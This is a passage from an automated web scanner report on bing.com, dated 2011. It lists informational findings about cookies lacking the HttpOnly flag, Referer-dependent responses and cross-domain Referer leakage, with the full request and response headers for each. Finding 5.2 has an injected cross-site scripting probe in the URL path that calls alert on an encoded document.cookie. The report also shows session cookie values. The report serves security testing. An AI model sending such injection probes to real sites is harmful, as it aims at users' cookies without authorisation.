Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=614
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:53 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6992B41421FD424494A2E9A2F1D31BD9; domain=.bing.com; path=/
Content-Length: 163651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.33. http://www.bing.com/videos/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/videos
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460632; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D9A439CD6DD34C458F5BDF24BB030719; domain=.bing.com; path=/


3.34. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:00 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E275C0252494A33BD7C7B00733A78E2; domain=.bing.com; path=/
Content-Length: 73214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.35. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:58:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3E58DCD97AD8436DB0D6F76EA649A7C4; domain=.bing.com; path=/
Content-Length: 68575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.36. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:15 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:15 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A410FF9BF98B4F51BF7EF5A84D10EA58; domain=.bing.com; path=/
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.37. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:48:52 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=438B0C95E5964EF9BFC5329EA9644004; domain=.bing.com; path=/
Content-Length: 74286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.38. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:12 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=296FB50835524F1CAC808C6CC833F2EF; domain=.bing.com; path=/
Content-Length: 68455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.39. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/tip-stress-and-love/1revqyosz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/tip-stress-and-love/1revqyosz HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:23 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:23 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5F471059863C43D5904D61DB170BF835; domain=.bing.com; path=/
Content-Length: 72713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

4. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /settings.aspx

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:28:15 GMT
Connection: close
Content-Length: 19079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_820137",IG:"11a2df3d6d724aa5b963916bd0908353",EventID:"DC08929786EA4A8B8E4EFB4857C6BCA0",P:"SERP",DA:"Bl2",SUIH:"1_z7zQbanvRFNcd5-KBq6A",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/settings.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">.sw_box h1{margin:-1em 0 0 5px;display:inline-block;color:#525051;font-size:150%;padding-left:80px;float:left}</style><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Bobcat_EN-US790259691o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
function si_fbInit(d,c,e){var a=this;a.appNs=d;a.wfId=e;var b=0;a.loadCard=function(){if(!b){sj_jb(c,1);b=1}};a.openC
...[SNIP]...

Request 2

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:28:18 GMT
Connection: close
Content-Length: 19043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_820137",IG:"94bb4e042d674fb7be1d3584654813e1",EventID:"9C07CEADCD3046CE815889272E90FA52",P:"SERP",DA:"Bl2",SUIH:"1_z7zQbanvRFNcd5-KBq6A",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/settings.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">.sw_box h1{margin:-1em 0 0 5px;display:inline-block;color:#525051;font-size:150%;padding-left:80px;float:left}</style><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Bobcat_EN-US790259691o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
function si_fbInit(d,c,e){var a=this;a.appNs=d;a.wfId=e;var b=0;a.loadCard=function(){if(!b){sj_jb(c,1);b=1}};a.openC
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 8 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.bing.com/fd/fb/mulmfg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/mulmfg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fd/fb/mulmfg?IG=343442e43b60467d81fa6f25a8ec9efd&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Flocal%2F HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:29:31 GMT
Connection: close
Content-Length: 1424

<li><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1297466971&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%252flocal%252f&amp;lc=1033&amp;id=264960" onmousedown="return si_T('&amp;ID=FD.FD.1,4.1')"><span id="sw_tliw">
...[SNIP]...
</a> &#xb7; <a href="http://go.microsoft.com/fwlink/?LinkID=191371" onmousedown="return si_T('&amp;ID=FD.FD.1,9.1')"><span>
...[SNIP]...

5.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
